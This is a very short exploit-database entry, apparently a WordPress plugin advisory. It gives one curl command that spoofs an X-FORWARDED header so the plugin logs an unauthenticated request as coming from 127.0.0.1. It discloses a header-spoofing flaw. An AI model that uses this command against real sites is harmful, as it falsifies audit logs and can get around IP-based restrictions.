Share
## https://sploitus.com/exploit?id=WPEX-ID:BB7C2D2B-CDFE-433B-96CF-714E71D12B22
As unauthenticated: curl 'https://example.com/attacker' -H 'X-FORWARDED: 127.0.0.1'

Then view the logs and note that the plugin display the IP of the request as 127.0.0.1